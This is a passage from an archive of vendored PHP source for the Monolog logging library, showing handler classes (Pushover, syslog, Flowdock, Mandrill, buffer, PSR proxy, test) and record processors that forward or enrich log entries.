. ':' . $record['level_name'] . ':' . preg_replace('{[\r\n].*}', '', $record['message']) . "\n", FILE_APPEND); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/PushoverHandler.php000064400000017625147600400120022615 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; use Psr\Log\LogLevel; /** * Sends notifications through the pushover api to mobile phones * * @author Sebastian Göttschkes * @see https://www.pushover.net/api * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class PushoverHandler extends SocketHandler { /** @var string */ private $token; /** @var array */ private $users; /** @var string */ private $title; /** @var string|int|null */ private $user = null; /** @var int */ private $retry; /** @var int */ private $expire; /** @var int */ private $highPriorityLevel; /** @var int */ private $emergencyLevel; /** @var bool */ private $useFormattedMessage = false; /** * All parameters that can be sent to Pushover * @see https://pushover.net/api * @var array */ private $parameterNames = [ 'token' => true, 'user' => true, 'message' => true, 'device' => true, 'title' => true, 'url' => true, 'url_title' => true, 'priority' => true, 'timestamp' => true, 'sound' => true, 'retry' => true, 'expire' => true, 'callback' => true, ]; /** * Sounds the api supports by default * @see https://pushover.net/api#sounds * @var string[] */ private $sounds = [ 'pushover', 'bike', 'bugle', 'cashregister', 'classical', 'cosmic', 'falling', 'gamelan', 'incoming', 'intermission', 'magic', 'mechanical', 'pianobar', 'siren', 'spacealarm', 'tugboat', 'alien', 'climb', 'persistent', 'echo', 'updown', 'none', ]; /** * @param string $token Pushover api token * @param string|array $users Pushover user id or array of ids the message will be sent to * @param string|null $title Title sent to the Pushover API * @param bool $useSSL Whether to connect via SSL. Required when pushing messages to users that are not * the pushover.net app owner. OpenSSL is required for this option. * @param string|int $highPriorityLevel The minimum logging level at which this handler will start * sending "high priority" requests to the Pushover API * @param string|int $emergencyLevel The minimum logging level at which this handler will start * sending "emergency" requests to the Pushover API * @param int $retry The retry parameter specifies how often (in seconds) the Pushover servers will * send the same notification to the user. * @param int $expire The expire parameter specifies how many seconds your notification will continue * to be retried for (every retry seconds). * * @phpstan-param string|array $users * @phpstan-param Level|LevelName|LogLevel::* $highPriorityLevel * @phpstan-param Level|LevelName|LogLevel::* $emergencyLevel */ public function __construct( string $token, $users, ?string $title = null, $level = Logger::CRITICAL, bool $bubble = true, bool $useSSL = true, $highPriorityLevel = Logger::CRITICAL, $emergencyLevel = Logger::EMERGENCY, int $retry = 30, int $expire = 25200, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { $connectionString = $useSSL ? 'ssl://api.pushover.net:443' : 'api.pushover.net:80'; parent::__construct( $connectionString, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->token = $token; $this->users = (array) $users; $this->title = $title ?: (string) gethostname(); $this->highPriorityLevel = Logger::toMonologLevel($highPriorityLevel); $this->emergencyLevel = Logger::toMonologLevel($emergencyLevel); $this->retry = $retry; $this->expire = $expire; } protected function generateDataStream(array $record): string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * @phpstan-param FormattedRecord $record */ private function buildContent(array $record): string { // Pushover has a limit of 512 characters on title and message combined. $maxMessageLength = 512 - strlen($this->title); $message = ($this->useFormattedMessage) ? $record['formatted'] : $record['message']; $message = Utils::substr($message, 0, $maxMessageLength); $timestamp = $record['datetime']->getTimestamp(); $dataArray = [ 'token' => $this->token, 'user' => $this->user, 'message' => $message, 'title' => $this->title, 'timestamp' => $timestamp, ]; if (isset($record['level']) && $record['level'] >= $this->emergencyLevel) { $dataArray['priority'] = 2; $dataArray['retry'] = $this->retry; $dataArray['expire'] = $this->expire; } elseif (isset($record['level']) && $record['level'] >= $this->highPriorityLevel) { $dataArray['priority'] = 1; } // First determine the available parameters $context = array_intersect_key($record['context'], $this->parameterNames); $extra = array_intersect_key($record['extra'], $this->parameterNames); // Least important info should be merged with subsequent info $dataArray = array_merge($extra, $context, $dataArray); // Only pass sounds that are supported by the API if (isset($dataArray['sound']) && !in_array($dataArray['sound'], $this->sounds)) { unset($dataArray['sound']); } return http_build_query($dataArray); } private function buildHeader(string $content): string { $header = "POST /1/messages.json HTTP/1.1\r\n"; $header .= "Host: api.pushover.net\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } protected function write(array $record): void { foreach ($this->users as $user) { $this->user = $user; parent::write($record); $this->closeSocket(); } $this->user = null; } /** * @param int|string $value * * @phpstan-param Level|LevelName|LogLevel::* $value */ public function setHighPriorityLevel($value): self { $this->highPriorityLevel = Logger::toMonologLevel($value); return $this; } /** * @param int|string $value * * @phpstan-param Level|LevelName|LogLevel::* $value */ public function setEmergencyLevel($value): self { $this->emergencyLevel = Logger::toMonologLevel($value); return $this; } /** * Use the formatted message? */ public function useFormattedMessage(bool $value): self { $this->useFormattedMessage = $value; return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/TestHandler.php000064400000015136147600400120021714 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Psr\Log\LogLevel; /** * Used for testing purposes. * * It records all records and gives you access to them for verification. * * @author Jordi Boggiano * * @method bool hasEmergency($record) * @method bool hasAlert($record) * @method bool hasCritical($record) * @method bool hasError($record) * @method bool hasWarning($record) * @method bool hasNotice($record) * @method bool hasInfo($record) * @method bool hasDebug($record) * * @method bool hasEmergencyRecords() * @method bool hasAlertRecords() * @method bool hasCriticalRecords() * @method bool hasErrorRecords() * @method bool hasWarningRecords() * @method bool hasNoticeRecords() * @method bool hasInfoRecords() * @method bool hasDebugRecords() * * @method bool hasEmergencyThatContains($message) * @method bool hasAlertThatContains($message) * @method bool hasCriticalThatContains($message) * @method bool hasErrorThatContains($message) * @method bool hasWarningThatContains($message) * @method bool hasNoticeThatContains($message) * @method bool hasInfoThatContains($message) * @method bool hasDebugThatContains($message) * * @method bool hasEmergencyThatMatches($message) * @method bool hasAlertThatMatches($message) * @method bool hasCriticalThatMatches($message) * @method bool hasErrorThatMatches($message) * @method bool hasWarningThatMatches($message) * @method bool hasNoticeThatMatches($message) * @method bool hasInfoThatMatches($message) * @method bool hasDebugThatMatches($message) * * @method bool hasEmergencyThatPasses($message) * @method bool hasAlertThatPasses($message) * @method bool hasCriticalThatPasses($message) * @method bool hasErrorThatPasses($message) * @method bool hasWarningThatPasses($message) * @method bool hasNoticeThatPasses($message) * @method bool hasInfoThatPasses($message) * @method bool hasDebugThatPasses($message) * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class TestHandler extends AbstractProcessingHandler { /** @var Record[] */ protected $records = []; /** @var array */ protected $recordsByLevel = []; /** @var bool */ private $skipReset = false; /** * @return array * * @phpstan-return Record[] */ public function getRecords() { return $this->records; } /** * @return void */ public function clear() { $this->records = []; $this->recordsByLevel = []; } /** * @return void */ public function reset() { if (!$this->skipReset) { $this->clear(); } } /** * @return void */ public function setSkipReset(bool $skipReset) { $this->skipReset = $skipReset; } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecords($level): bool { return isset($this->recordsByLevel[Logger::toMonologLevel($level)]); } /** * @param string|array $record Either a message string or an array containing message and optionally context keys that will be checked against all records * @param string|int $level Logging level value or name * * @phpstan-param array{message: string, context?: mixed[]}|string $record * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecord($record, $level): bool { if (is_string($record)) { $record = array('message' => $record); } return $this->hasRecordThatPasses(function ($rec) use ($record) { if ($rec['message'] !== $record['message']) { return false; } if (isset($record['context']) && $rec['context'] !== $record['context']) { return false; } return true; }, $level); } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatContains(string $message, $level): bool { return $this->hasRecordThatPasses(function ($rec) use ($message) { return strpos($rec['message'], $message) !== false; }, $level); } /** * @param string|int $level Logging level value or name * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatMatches(string $regex, $level): bool { return $this->hasRecordThatPasses(function (array $rec) use ($regex): bool { return preg_match($regex, $rec['message']) > 0; }, $level); } /** * @param string|int $level Logging level value or name * @return bool * * @psalm-param callable(Record, int): mixed $predicate * @phpstan-param Level|LevelName|LogLevel::* $level */ public function hasRecordThatPasses(callable $predicate, $level) { $level = Logger::toMonologLevel($level); if (!isset($this->recordsByLevel[$level])) { return false; } foreach ($this->recordsByLevel[$level] as $i => $rec) { if ($predicate($rec, $i)) { return true; } } return false; } /** * {@inheritDoc} */ protected function write(array $record): void { $this->recordsByLevel[$record['level']][] = $record; $this->records[] = $record; } /** * @param string $method * @param mixed[] $args * @return bool */ public function __call($method, $args) { if (preg_match('/(.*)(Debug|Info|Notice|Warning|Error|Critical|Alert|Emergency)(.*)/', $method, $matches) > 0) { $genericMethod = $matches[1] . ('Records' !== $matches[3] ? 'Record' : '') . $matches[3]; $level = constant('Monolog\Logger::' . strtoupper($matches[2])); $callback = [$this, $genericMethod]; if (is_callable($callback)) { $args[] = $level; return call_user_func_array($callback, $args); } } throw new \BadMethodCallException('Call to undefined method ' . get_class($this) . '::' . $method . '()'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php000064400000010621147600400120022720 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use DateTimeInterface; use Monolog\Logger; use Monolog\Handler\SyslogUdp\UdpSocket; use Monolog\Utils; /** * A Handler for logging to a remote syslogd server. * * @author Jesper Skovgaard Nielsen * @author Dominik Kukacka */ class SyslogUdpHandler extends AbstractSyslogHandler { const RFC3164 = 0; const RFC5424 = 1; const RFC5424e = 2; /** @var array */ private $dateFormats = array( self::RFC3164 => 'M d H:i:s', self::RFC5424 => \DateTime::RFC3339, self::RFC5424e => \DateTime::RFC3339_EXTENDED, ); /** @var UdpSocket */ protected $socket; /** @var string */ protected $ident; /** @var self::RFC* */ protected $rfc; /** * @param string $host Either IP/hostname or a path to a unix socket (port must be 0 then) * @param int $port Port number, or 0 if $host is a unix socket * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * @param string $ident Program name or tag for each log message. * @param int $rfc RFC to format the message for. * @throws MissingExtensionException * * @phpstan-param self::RFC* $rfc */ public function __construct(string $host, int $port = 514, $facility = LOG_USER, $level = Logger::DEBUG, bool $bubble = true, string $ident = 'php', int $rfc = self::RFC5424) { if (!extension_loaded('sockets')) { throw new MissingExtensionException('The sockets extension is required to use the SyslogUdpHandler'); } parent::__construct($facility, $level, $bubble); $this->ident = $ident; $this->rfc = $rfc; $this->socket = new UdpSocket($host, $port); } protected function write(array $record): void { $lines = $this->splitMessageIntoLines($record['formatted']); $header = $this->makeCommonSyslogHeader($this->logLevels[$record['level']], $record['datetime']); foreach ($lines as $line) { $this->socket->write($line, $header); } } public function close(): void { $this->socket->close(); } /** * @param string|string[] $message * @return string[] */ private function splitMessageIntoLines($message): array { if (is_array($message)) { $message = implode("\n", $message); } $lines = preg_split('/$\R?^/m', (string) $message, -1, PREG_SPLIT_NO_EMPTY); if (false === $lines) { $pcreErrorCode = preg_last_error(); throw new \RuntimeException('Could not preg_split: ' . $pcreErrorCode . ' / ' . Utils::pcreLastErrorMessage($pcreErrorCode)); } return $lines; } /** * Make common syslog header (see rfc5424 or rfc3164) */ protected function makeCommonSyslogHeader(int $severity, DateTimeInterface $datetime): string { $priority = $severity + $this->facility; if (!$pid = getmypid()) { $pid = '-'; } if (!$hostname = gethostname()) { $hostname = '-'; } if ($this->rfc === self::RFC3164) { // see https://github.com/phpstan/phpstan/issues/5348 // @phpstan-ignore-next-line $dateNew = $datetime->setTimezone(new \DateTimeZone('UTC')); $date = $dateNew->format($this->dateFormats[$this->rfc]); return "<$priority>" . $date . " " . $hostname . " " . $this->ident . "[" . $pid . "]: "; } $date = $datetime->format($this->dateFormats[$this->rfc]); return "<$priority>1 " . $date . " " . $hostname . " " . $this->ident . " " . $pid . " - - "; } /** * Inject your own socket, mainly used for testing */ public function setSocket(UdpSocket $socket): self { $this->socket = $socket; return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SyslogHandler.php000064400000003563147600400120022256 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; /** * Logs to syslog service. * * usage example: * * $log = new Logger('application'); * $syslog = new SyslogHandler('myfacility', 'local6'); * $formatter = new LineFormatter("%channel%.%level_name%: %message% %extra%"); * $syslog->setFormatter($formatter); * $log->pushHandler($syslog); * * @author Sven Paulus */ class SyslogHandler extends AbstractSyslogHandler { /** @var string */ protected $ident; /** @var int */ protected $logopts; /** * @param string $ident * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant * @param int $logopts Option flags for the openlog() call, defaults to LOG_PID */ public function __construct(string $ident, $facility = LOG_USER, $level = Logger::DEBUG, bool $bubble = true, int $logopts = LOG_PID) { parent::__construct($facility, $level, $bubble); $this->ident = $ident; $this->logopts = $logopts; } /** * {@inheritDoc} */ public function close(): void { closelog(); } /** * {@inheritDoc} */ protected function write(array $record): void { if (!openlog($this->ident, $this->logopts, $this->facility)) { throw new \LogicException('Can\'t open syslog for ident "'.$this->ident.'" and facility "'.$this->facility.'"' . Utils::getRecordMessageForException($record)); } syslog($this->logLevels[$record['level']], (string) $record['formatted']); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FlowdockHandler.php000064400000007046147600400120022546 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; use Monolog\Formatter\FlowdockFormatter; use Monolog\Formatter\FormatterInterface; /** * Sends notifications through the Flowdock push API * * This must be configured with a FlowdockFormatter instance via setFormatter() * * Notes: * API token - Flowdock API token * * @author Dominik Liebler * @see https://www.flowdock.com/api/push * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler * @deprecated Since 2.9.0 and 3.3.0, Flowdock was shutdown we will thus drop this handler in Monolog 4 */ class FlowdockHandler extends SocketHandler { /** * @var string */ protected $apiToken; /** * @throws MissingExtensionException if OpenSSL is missing */ public function __construct( string $apiToken, $level = Logger::DEBUG, bool $bubble = true, bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null ) { if (!extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP extension is required to use the FlowdockHandler'); } parent::__construct( 'ssl://api.flowdock.com:443', $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->apiToken = $apiToken; } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if (!$formatter instanceof FlowdockFormatter) { throw new \InvalidArgumentException('The FlowdockHandler requires an instance of Monolog\Formatter\FlowdockFormatter to function correctly'); } return parent::setFormatter($formatter); } /** * Gets the default formatter. */ protected function getDefaultFormatter(): FormatterInterface { throw new \InvalidArgumentException('The FlowdockHandler must be configured (via setFormatter) with an instance of Monolog\Formatter\FlowdockFormatter to function correctly'); } /** * {@inheritDoc} */ protected function write(array $record): void { parent::write($record); $this->closeSocket(); } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record): string { return Utils::jsonEncode($record['formatted']['flowdock']); } /** * Builds the header of the API Call */ private function buildHeader(string $content): string { $header = "POST /v1/messages/team_inbox/" . $this->apiToken . " HTTP/1.1\r\n"; $header .= "Host: api.flowdock.com\r\n"; $header .= "Content-Type: application/json\r\n"; $header .= "Content-Length: " . strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php000064400000011044147600400120022200 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\ResettableInterface; use Monolog\Formatter\FormatterInterface; /** * Buffers all records until closing the handler and then pass them as batch. * * This is useful for a MailHandler to send only one mail per request instead of * sending one per log message. * * @author Christophe Coevoet * * @phpstan-import-type Record from \Monolog\Logger */ class BufferHandler extends AbstractHandler implements ProcessableHandlerInterface, FormattableHandlerInterface { use ProcessableHandlerTrait; /** @var HandlerInterface */ protected $handler; /** @var int */ protected $bufferSize = 0; /** @var int */ protected $bufferLimit; /** @var bool */ protected $flushOnOverflow; /** @var Record[] */ protected $buffer = []; /** @var bool */ protected $initialized = false; /** * @param HandlerInterface $handler Handler. * @param int $bufferLimit How many entries should be buffered at most, beyond that the oldest items are removed from the buffer. * @param bool $flushOnOverflow If true, the buffer is flushed when the max size has been reached, by default oldest entries are discarded */ public function __construct(HandlerInterface $handler, int $bufferLimit = 0, $level = Logger::DEBUG, bool $bubble = true, bool $flushOnOverflow = false) { parent::__construct($level, $bubble); $this->handler = $handler; $this->bufferLimit = $bufferLimit; $this->flushOnOverflow = $flushOnOverflow; } /** * {@inheritDoc} */ public function handle(array $record): bool { if ($record['level'] < $this->level) { return false; } if (!$this->initialized) { // __destructor() doesn't get called on Fatal errors register_shutdown_function([$this, 'close']); $this->initialized = true; } if ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) { if ($this->flushOnOverflow) { $this->flush(); } else { array_shift($this->buffer); $this->bufferSize--; } } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->buffer[] = $record; $this->bufferSize++; return false === $this->bubble; } public function flush(): void { if ($this->bufferSize === 0) { return; } $this->handler->handleBatch($this->buffer); $this->clear(); } public function __destruct() { // suppress the parent behavior since we already have register_shutdown_function() // to call close(), and the reference contained there will prevent this from being // GC'd until the end of the request } /** * {@inheritDoc} */ public function close(): void { $this->flush(); $this->handler->close(); } /** * Clears the buffer without flushing any messages down to the wrapped handler. */ public function clear(): void { $this->bufferSize = 0; $this->buffer = []; } public function reset() { $this->flush(); parent::reset(); $this->resetProcessors(); if ($this->handler instanceof ResettableInterface) { $this->handler->reset(); } } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if ($this->handler instanceof FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type '.get_class($this->handler).' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { if ($this->handler instanceof FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type '.get_class($this->handler).' does not support formatters.'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/PsrHandler.php000064400000004610147600400120021534 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Psr\Log\LoggerInterface; use Monolog\Formatter\FormatterInterface; /** * Proxies log messages to an existing PSR-3 compliant logger. * * If a formatter is configured, the formatter's output MUST be a string and the * formatted message will be fed to the wrapped PSR logger instead of the original * log record's message. * * @author Michael Moussa */ class PsrHandler extends AbstractHandler implements FormattableHandlerInterface { /** * PSR-3 compliant logger * * @var LoggerInterface */ protected $logger; /** * @var FormatterInterface|null */ protected $formatter; /** * @param LoggerInterface $logger The underlying PSR-3 compliant logger to which messages will be proxied */ public function __construct(LoggerInterface $logger, $level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); $this->logger = $logger; } /** * {@inheritDoc} */ public function handle(array $record): bool { if (!$this->isHandling($record)) { return false; } if ($this->formatter) { $formatted = $this->formatter->format($record); $this->logger->log(strtolower($record['level_name']), (string) $formatted, $record['context']); } else { $this->logger->log(strtolower($record['level_name']), $record['message'], $record['context']); } return false === $this->bubble; } /** * Sets the formatter. * * @param FormatterInterface $formatter */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { $this->formatter = $formatter; return $this; } /** * Gets the formatter. * * @return FormatterInterface */ public function getFormatter(): FormatterInterface { if (!$this->formatter) { throw new \LogicException('No formatter has been set and this handler does not have a default formatter'); } return $this->formatter; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerInterface.php000064400000002255147600400120025056 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Processor\ProcessorInterface; /** * Interface to describe loggers that have processors * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger */ interface ProcessableHandlerInterface { /** * Adds a processor in the stack. * * @psalm-param ProcessorInterface|callable(Record): Record $callback * * @param ProcessorInterface|callable $callback * @return HandlerInterface self */ public function pushProcessor(callable $callback): HandlerInterface; /** * Removes the processor on top of the stack and returns it. * * @psalm-return ProcessorInterface|callable(Record): Record $callback * * @throws \LogicException In case the processor stack is empty * @return callable|ProcessorInterface */ public function popProcessor(): callable; } google-api/vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php000064400000005133147600400120022534 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\ResettableInterface; use Psr\Log\LogLevel; /** * Base Handler class providing basic level/bubble support * * @author Jordi Boggiano * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ abstract class AbstractHandler extends Handler implements ResettableInterface { /** * @var int * @phpstan-var Level */ protected $level = Logger::DEBUG; /** @var bool */ protected $bubble = true; /** * @param int|string $level The minimum logging level at which this handler will be triggered * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = Logger::DEBUG, bool $bubble = true) { $this->setLevel($level); $this->bubble = $bubble; } /** * {@inheritDoc} */ public function isHandling(array $record): bool { return $record['level'] >= $this->level; } /** * Sets minimum logging level at which this handler will be triggered. * * @param Level|LevelName|LogLevel::* $level Level or level name * @return self */ public function setLevel($level): self { $this->level = Logger::toMonologLevel($level); return $this; } /** * Gets minimum logging level at which this handler will be triggered. * * @return int * * @phpstan-return Level */ public function getLevel(): int { return $this->level; } /** * Sets the bubbling behavior. * * @param bool $bubble true means that this handler allows bubbling. * false means that bubbling is not permitted. * @return self */ public function setBubble(bool $bubble): self { $this->bubble = $bubble; return $this; } /** * Gets the bubbling behavior. * * @return bool true means that this handler allows bubbling. * false means that bubbling is not permitted. */ public function getBubble(): bool { return $this->bubble; } /** * {@inheritDoc} */ public function reset() { } } google-api/vendor/monolog/monolog/src/Monolog/Handler/WhatFailureGroupHandler.php000064400000003635147600400120024226 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * Forwards records to multiple handlers suppressing failures of each handler * and continuing through to give every handler a chance to succeed. * * @author Craig D'Amelio * * @phpstan-import-type Record from \Monolog\Logger */ class WhatFailureGroupHandler extends GroupHandler { /** * {@inheritDoc} */ public function handle(array $record): bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } foreach ($this->handlers as $handler) { try { $handler->handle($record); } catch (\Throwable $e) { // What failure? } } return false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records): void { if ($this->processors) { $processed = array(); foreach ($records as $record) { $processed[] = $this->processRecord($record); } /** @var Record[] $records */ $records = $processed; } foreach ($this->handlers as $handler) { try { $handler->handleBatch($records); } catch (\Throwable $e) { // What failure? } } } /** * {@inheritDoc} */ public function close(): void { foreach ($this->handlers as $handler) { try { $handler->close(); } catch (\Throwable $e) { // What failure? } } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/MandrillHandler.php000064400000004651147600400120022537 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Swift; use Swift_Message; /** * MandrillHandler uses cURL to send the emails to the Mandrill API * * @author Adam Nicholson */ class MandrillHandler extends MailHandler { /** @var Swift_Message */ protected $message; /** @var string */ protected $apiKey; /** * @psalm-param Swift_Message|callable(): Swift_Message $message * * @param string $apiKey A valid Mandrill API key * @param callable|Swift_Message $message An example message for real messages, only the body will be replaced */ public function __construct(string $apiKey, $message, $level = Logger::ERROR, bool $bubble = true) { parent::__construct($level, $bubble); if (!$message instanceof Swift_Message && is_callable($message)) { $message = $message(); } if (!$message instanceof Swift_Message) { throw new \InvalidArgumentException('You must provide either a Swift_Message instance or a callable returning it'); } $this->message = $message; $this->apiKey = $apiKey; } /** * {@inheritDoc} */ protected function send(string $content, array $records): void { $mime = 'text/plain'; if ($this->isHtmlBody($content)) { $mime = 'text/html'; } $message = clone $this->message; $message->setBody($content, $mime); /** @phpstan-ignore-next-line */ if (version_compare(Swift::VERSION, '6.0.0', '>=')) { $message->setDate(new \DateTimeImmutable()); } else { /** @phpstan-ignore-next-line */ $message->setDate(time()); } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://mandrillapp.com/api/1.0/messages/send-raw.json'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'key' => $this->apiKey, 'raw_message' => (string) $message, 'async' => false, ])); Curl\Util::execute($ch); } } google-api/vendor/monolog/monolog/src/Monolog/Processor/MemoryPeakUsageProcessor.php000064400000001504147600400120025031 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Injects memory_get_peak_usage in all records * * @see Monolog\Processor\MemoryProcessor::__construct() for options * @author Rob Jensen */ class MemoryPeakUsageProcessor extends MemoryProcessor { /** * {@inheritDoc} */ public function __invoke(array $record): array { $usage = memory_get_peak_usage($this->realUsage); if ($this->useFormatting) { $usage = $this->formatBytes($usage); } $record['extra']['memory_peak_usage'] = $usage; return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/MemoryUsageProcessor.php000064400000001461147600400120024232 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Injects memory_get_usage in all records * * @see Monolog\Processor\MemoryProcessor::__construct() for options * @author Rob Jensen */ class MemoryUsageProcessor extends MemoryProcessor { /** * {@inheritDoc} */ public function __invoke(array $record): array { $usage = memory_get_usage($this->realUsage); if ($this->useFormatting) { $usage = $this->formatBytes($usage); } $record['extra']['memory_usage'] = $usage; return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Processor/IntrospectionProcessor.php000064400000007434147600400120024643 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; use Monolog\Logger; use Psr\Log\LogLevel; /** * Injects line/file:class/function where the log message came from * * Warning: This only works if the handler processes the logs directly. * If you put the processor on a handler that is behind a FingersCrossedHandler * for example, the processor will only be called once the trigger level is reached, * and all the log records will have the same file/line/.. data from the call that * triggered the FingersCrossedHandler. * * @author Jordi Boggiano * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class IntrospectionProcessor implements ProcessorInterface { /** @var int */ private $level; /** @var string[] */ private $skipClassesPartials; /** @var int */ private $skipStackFramesCount; /** @var string[] */ private $skipFunctions = [ 'call_user_func', 'call_user_func_array', ]; /** * @param string|int $level The minimum logging level at which this Processor will be triggered * @param string[] $skipClassesPartials * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = Logger::DEBUG, array $skipClassesPartials = [], int $skipStackFramesCount = 0) { $this->level = Logger::toMonologLevel($level); $this->skipClassesPartials = array_merge(['Monolog\\'], $skipClassesPartials); $this->skipStackFramesCount = $skipStackFramesCount; } /** * {@inheritDoc} */ public function __invoke(array $record): array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $trace = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS); // skip first since it's always the current method array_shift($trace); // the call_user_func call is also skipped array_shift($trace); $i = 0; while ($this->isTraceClassOrSkippedFunction($trace, $i)) { if (isset($trace[$i]['class'])) { foreach ($this->skipClassesPartials as $part) { if (strpos($trace[$i]['class'], $part) !== false) { $i++; continue 2; } } } elseif (in_array($trace[$i]['function'], $this->skipFunctions)) { $i++; continue; } break; } $i += $this->skipStackFramesCount; // we should have the call source now $record['extra'] = array_merge( $record['extra'], [ 'file' => isset($trace[$i - 1]['file']) ? $trace[$i - 1]['file'] : null, 'line' => isset($trace[$i - 1]['line']) ? $trace[$i - 1]['line'] : null, 'class' => isset($trace[$i]['class']) ? $trace[$i]['class'] : null, 'callType' => isset($trace[$i]['type']) ? $trace[$i]['type'] : null, 'function' => isset($trace[$i]['function']) ? $trace[$i]['function'] : null, ] ); return $record; } /** * @param array[] $trace */ private function isTraceClassOrSkippedFunction(array $trace, int $index): bool { if (!isset($trace[$index])) { return false; } return isset($trace[$index]['class']) || in_array($trace[$index]['function'], $this->skipFunctions); } } google-api/vendor/monolog/monolog/src/Monolog/Processor/TagProcessor.php000064400000002142147600400120022505 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Processor; /** * Adds a tags array into record * * @author Martijn Riemers */ class TagProcessor implements ProcessorInterface { /** @var string[] */ private $tags; /** * @param string[] $tags */ public function __construct(array $tags = []) { $this->setTags($tags); } /** * @param string[] $tags */ public function addTags(array $tags = []): self { $this->tags = array_merge($this->tags, $tags); return $this; } /** * @param string[] $tags */ public function setTags(array $tags = []): self { $this->tags = $tags; return $this; } /** * {@inheritDoc} */ public function 